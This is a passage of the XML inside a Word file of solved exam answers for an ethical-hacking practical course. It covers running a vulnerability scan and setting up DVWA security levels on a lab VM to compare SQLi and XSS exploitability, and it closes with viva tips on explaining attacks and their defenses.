        <w:t xml:space="preserve">Create a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the IP/range) and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> referencing it, then start the scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once complete, open the scan results and export/generate a PDF/XML report listing vulnerabilities with CVSS scores and remediation notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Set up DVWA on your VM and configure security levels (Low, Medium, High) (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log in to DVWA as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"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Go to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select a level (Low/Medium/High/Impossible) and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Submit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Re-test the same vulnerability (e.g., SQLi or XSS) at each level to observe how increasing security changes (or blocks) exploitability — demonstrating the value of proper input validation/sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">General viva tips: be ready to explain what each tool does, why the attack works (the underlying vulnerability class), and the corresponding defense/mitigation for every exploit demonstrated above.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5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2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3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3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4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4"/>
    </w:lvlOverride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2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3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3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3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Ethical Hacking Practical (CDS-203-MJP) – Solved Slips</dc:title>
  <dc:description>Claude Docs node/23825e8a-fdba@1 docx-w6</dc:description>
  <cp:revision>1</cp:revision>
</cp:coreProperties>
</file>